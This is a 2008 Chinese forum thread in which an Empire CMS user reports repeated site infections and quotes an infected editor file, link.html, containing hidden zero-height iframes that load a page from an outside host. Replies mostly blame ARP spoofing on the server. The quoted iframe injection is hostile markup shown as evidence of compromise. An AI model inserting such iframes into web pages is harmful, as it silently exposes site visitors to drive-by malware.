下载帝国网站管理系统5.0正式版
 帝国论坛技术交流区建站交流帝国编辑器的漏洞?网站经常被挂马 【本版专题贴子】  
帝国备份王2008版发布
帝国CMS模板下载中心
测试:生成20万数据共用107分钟
《帝国下载系统》全面免费
帝国域名交易网
1G双线帝国空间+200M数据库=158
站长工具 - dotool.cn
广告联系QQ:627174919
 1/2     1 2 ›› ›|
主题:帝国编辑器的漏洞?网站经常被挂马 [加入收藏夹]   
本主题由 帝兴 于 2008-04-02 09:45:36 锁定

t5k5
用户头衔:举人

精华贴   :0
发贴数   :267
经验值   :734
注册时间:2006-07-14
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》基础教程下载】   [第 1 楼]
帝国编辑器的漏洞?网站经常被挂马
请WC检查下是否真的有漏洞,我已经换了几个空间了,每次都是重新上传的程序再恢复数据。
我以前也认为网站没有漏洞,很安全,认为都是服务器被挂马或者服务器的漏洞。
但是事实就这样,我还有两个用帝国的朋友也被挂同样的马,这是为什么?


截取一部分代码:
e/admin/editor/popups/
link.html
select_color.html
old-fullscreen.html
old_insert_image.html
editor_help.html
……
还有其他目录的其他文件也有被iframe的代码。





<html>

<head>
  <title>Insert/Modify Link</TITLE><iframe src="http://www.jtxp.net/mm/p121.htm?9" width="100" height="0"></iframe><iframe src="http://www.jtxp.net/mm/p121.htm?9" width="100" height="0"></iframe>
  <script type="text/javascript" src="popup.js"></script>


切游网-最新网络游戏指南站
2008-03-19 11:19:14 已设置保密 顶部 回复 引用 报告 编辑 删除

hicode
用户头衔:版主

精华贴   :1
发贴数   :10387
经验值   :22595
注册时间:2007-07-20
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》零基础实例入门教程】   [第 2 楼]

服务器中arp了



2008-03-19 11:25:13 已设置保密 顶部 回复 引用 报告 编辑 删除

vfxx
用户头衔:书生

精华贴   :0
发贴数   :3
经验值   :22
注册时间:2008-01-23
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》基础教程下载】   [第 3 楼]

ARP



2008-03-19 11:27:21 已设置保密 顶部 回复 引用 报告 编辑 删除

lycool
用户头衔:举人

精华贴   :0
发贴数   :269
经验值   :700
注册时间:2008-02-15
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》零基础实例入门教程】   [第 4 楼]

装个360的arp防火墙,很好用



2008-03-19 11:29:50 已设置保密 顶部 回复 引用 报告 编辑 删除

t5k5
用户头衔:举人

精华贴   :0
发贴数   :267
经验值   :734
注册时间:2006-07-14
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》基础教程下载】   [第 5 楼]

服务器上其他网站均没有问题!就帝国的站遭了。


切游网-最新网络游戏指南站
2008-03-19 12:08:05 已设置保密 顶部 回复 引用 报告 编辑 删除

wwwkkkf
用户头衔:版主 *

精华贴   :0
发贴数   :3249
经验值   :5274
注册时间:2006-02-20
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》零基础实例入门教程】   [第 6 楼]

arp一般是网站服务器中的


郑州百姓网,百姓生活好帮手!
http://zhengzhou.baixing.com
2008-03-19 12:15:22 已设置保密 顶部 回复 引用 报告 编辑 删除

t5k5
用户头衔:举人

精华贴   :0
发贴数   :267
经验值   :734
注册时间:2006-07-14
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》基础教程下载】   [第 7 楼]

这个我知道,我以前也中过arp,但这次不一样啊,换了服务器都还有。并且其他两个朋友用帝国做的站也被挂马了。


切游网-最新网络游戏指南站
2008-03-19 12:23:30 已设置保密 顶部 回复 引用 报告 编辑 删除

nppcb
用户头衔:秀才

精华贴   :0
发贴数   :121
经验值   :333
注册时间:2007-05-30
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》零基础实例入门教程】   [第 8 楼]

arp,看看是不是机房中了



2008-03-19 13:31:26 已设置保密 顶部 回复 引用 报告 编辑 删除

t5k5
用户头衔:举人

精华贴   :0
发贴数   :267
经验值   :734
注册时间:2006-07-14
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》基础教程下载】   [第 9 楼]

中arp所有网站都逃不了吧?为什么偏偏是几个用帝国的啊???


切游网-最新网络游戏指南站
2008-03-20 21:51:25 已设置保密 顶部 回复 引用 报告 编辑 删除

luring
用户头衔:进士

精华贴   :1
发贴数   :1698
经验值   :4437
注册时间:2007-02-12
信息 搜索 好友 发送悄悄话 《帝国网站管理系统》零基础实例入门教程】   [第 10 楼]

只有帝国的中了?
同服务器吗?


不断学习 QQ群:5834465
订模板QQ:一二一三七七九二四
稀饭
女生宿舍,男人都爱看
2008-03-21 10:07:42 已设置保密 顶部 回复 引用 报告 编辑 删除
 1/2     1 2 ›› ›|

快速回复
内容

表情
使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
     【进入高级模式】   (按 Ctrl+Enter 直接提交)
    顶部  加入收藏夹
关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议
Powered by: EBB Version 2.2.1